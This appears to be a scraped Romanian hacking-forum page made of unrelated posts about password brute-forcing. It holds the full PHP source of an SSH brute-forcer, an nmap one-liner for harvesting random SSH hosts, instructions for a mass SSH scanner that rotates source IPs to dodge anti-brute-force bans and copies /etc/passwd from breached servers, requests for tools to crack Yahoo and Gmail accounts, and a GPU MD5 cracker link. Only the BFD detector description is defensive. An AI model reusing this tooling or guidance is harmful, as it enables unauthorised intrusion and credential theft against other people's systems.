Search the Community

When there's no technical vulnerability to exploit, you should try to hack what humans left for you, and believe me, this always works. Scylla provides all the power of what a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of scanning dynamically miss configuration bugs. Scylla try to be a better tool for security auditors, extremely faster, designed based on real scenarios, developed by experienced coders and constructed with the actual IT work methods. The words “Configuration Tracer” are the best definition for Scylla, a tool to help on IT audits. Scylla licence is: Get what you need, do what you need, but don't be an asshole, don't sell what's mine, tell people that i did it (unless you copy a couple of lines ) and then do what ever you want, just don't be a jerk. download Sa-l testam ,da cam complicat

Serus. De unde pot face rost de .." o lista cu mai multe parole de incercare pentru un bruteforce " .(gen dictionar ) ?

As avea nevoie de un brute force pentru a sparge emailuri de yahoo,gmail si un fisier cu parole posibile.

Current Release: http://www.rfxn.com/downloads/bfd-current.tar.gz http://www.rfxn.com/appdocs/README.bfd http://www.rfxn.com/appdocs/CHANGELOG.bfd Description BFD is a modular shell script for parsing application logs and checking for authentication failures. It does this using a rules system where application specific options are stored including regular expressions for each unique auth format. The regular expressions are parsed against logs using the ‘sed’ tool (stream editor) which allows for excellent performance in all environments. In addition to the benefits of parsing logs in a single stream with sed, BFD also uses a log tracking system so logs are only parsed from the point which they were last read. This greatly assists in extending the performance of BFD even further as we are not constantly reading the same log data. The log tracking system is compatible with syslog/logrotate style log rotations which allows it to detect when rotations have happened and grab log tails from both the new log file and the rotated log file. You can leverage BFD to block attackers using any number of tools such as APF, Shorewall, raw iptables, ip route or execute any custom command. There is also a fully customizable e-mail alerting system with an e-mail template that is well suited for every day use or you can open it up and modify it. The attacker tracking in BFD is handled using simple flat text files that are size-controlled to prevent space constraints over time, ideal for diskless devices. There is also an attack pool where trending data is stored on all hosts that have been blocked including which rule the block was triggered by. In the execution process, there is simply a cron job that executes BFD once every 3 minutes by default. The cronjob can be run more frequently for those that desire it and doing so will not cause any performance issues (no less than once a minute). Although cron execution does not permit BFD to act in real time, the log tracking system ensures it never misses a beat in authentication failures. Further, using cron provides a reliable frame work for consistent execution of BFD in a very simplified fashion across all *nix platforms. https://www.rfxn.com/projects/brute-force-detection/

//buna idee pentru un honeypot cand am nevoie de ceva pentru teste fac: nmap -iR 1000 -p 22 --open -sV --oG 22 apoi cat 22 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' si gata lista

SSH brute-forcer tool written in PHP. about: * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org usage: <?php/* .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * Usage : * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread> * Combolist : -c <combolist> -o <output> -t <thread> * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! */ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n********************************* ************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread> */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread> */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n******************************************** *\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / janissaries.org group ?>

EDIT: PENTRU SCANERUL DE BRUTE FORCE NUMAI MA CONTACTATI PE MESSENGER CA NU O SA VA MAI DAU ACCEPT, AM VANDUT SURSA. PENTRU A LUA LEGATURA CU CEL CARE SE OCUPA ACUM DE PROIECT DATI ADD PE MESS LA ID: ihackyourmindandsoul, SAU E-MAIL: ihackyourmindandsoul@yahoo.com . tar zxvf s2.tgz cd s2 screen ./scan_mic x.x sau ./mass x ctrl + a +d (pentru a iesi din screen ) screen -r ( pentru a reveni in screen ) in vuln.txt vin login in nobash.txt nologins. Informatii utile: ./ssh2 ip port user pass , pentru a testa functia de checker de la bruter. Daca ai un server cu mai multe ip-uri creezi in folderul cu scanerul : "interface.txt" si in el pe cate un rand adaugi ip-urile, si scanerul va lua de acolo circular ip-urile astfel sistemele de protectie anti brute force nu vor mai putea bana serverul din care folositi arhiva. Optimizare de thread-uri ( fork-uri ) daca ai luat o clasa cu prea putine ip-uri si ai setat un nr prea mare de thread-uri acest numar va fi automat redus astfel incat sa nu floodezi acele ip-uri. La logine iti salveaza pe serverul tau si /etc/passwd in fisierul cu scannerul "etc-passwd.txt", astfel vei putea sa iti maresti passfile-ul. De asemenea nu prinde acele ip la care merge orice combinatie de user si pass sau care te lasa sa bagi user si orice pass. Edit: In urma mesajelor de pe privat am marit timeout la 5 secunde arhiva este la acelasi link.

Nu stiu daca e ceva nou, dar tot postez. Pentru oricine are o placa video de la nVidia cu tehnologia CUDA, parolele md5 au devenit mai usor de spart prin bruteforce, asta daca nu te ajuta diferitele site-uri. Cerinte: - Linux Backtrack 4, Ubuntu ..., Windows XP(SP2 sau SP3), Vista, Sevenun procesor modern @1.5Ghz cu cel putin 512MB RAM, recomandat: procesor dual-core(sau quad) cu DDR2/DDR3. - o placa video CUDA-Enabled, gForce 8800GT pana la Tesla, Quadro si procesoarele astea noi Fermi Download Link: http://bvernoux.free.fr/md5/uploadFile?id=3 Full Description: MD5 Crack GPU (The fastest LGPL GPU MD5 password cracker) Nu l-am testat inca, fiindca folosesc masini virtuale peste masini virtuale si placa grafica nu e recunoscuta bine, intru ASAP in windows si testez.